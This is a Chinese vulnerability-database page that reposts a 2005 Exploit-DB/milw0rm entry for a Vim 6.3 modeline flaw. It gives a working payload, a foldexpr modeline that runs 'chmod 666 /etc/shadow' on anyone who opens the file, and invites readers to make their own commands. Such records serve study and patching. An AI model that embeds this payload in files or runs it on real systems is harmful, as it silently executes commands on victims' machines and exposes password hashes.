vim 6.3 < 6.3.082 - 'modlines' Local Command Execution

vim 6.3 < 6.3.082 – ‘modlines’ Local Command Execution

漏洞ID 1055285 漏洞类型
发布时间 2005-07-25 更新时间 2005-07-25
图片[1]-vim 6.3 < 6.3.082 - 'modlines' Local Command Execution-安全小百科CVE编号 N/A
图片[2]-vim 6.3 < 6.3.082 - 'modlines' Local Command Execution-安全小百科CNNVD-ID N/A
漏洞平台 Multiple CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/1119
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
1) open up a text file.

2) insert at the top the information (below).

/* vim: foldmethod=expr:foldexpr=glob("`chmod 666 /etc/shadow`") */

3) if modlines = on anyone that opens the file with vim will execute the command:
   chmod 666 /etc/shadow
   
Have fun making your own commands.

The advisory can be found at:
  http://www.guninski.com/where_do_you_want_billg_to_go_today_5.html

/str0ke

# milw0rm.com [2005-07-25]

相关推荐: Zap Book Server Side Include Arbitrary Command Execution Vulnerability

Zap Book Server Side Include Arbitrary Command Execution Vulnerability 漏洞ID 1101838 漏洞类型 Input Validation Error 发布时间 2002-06-30 更新…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享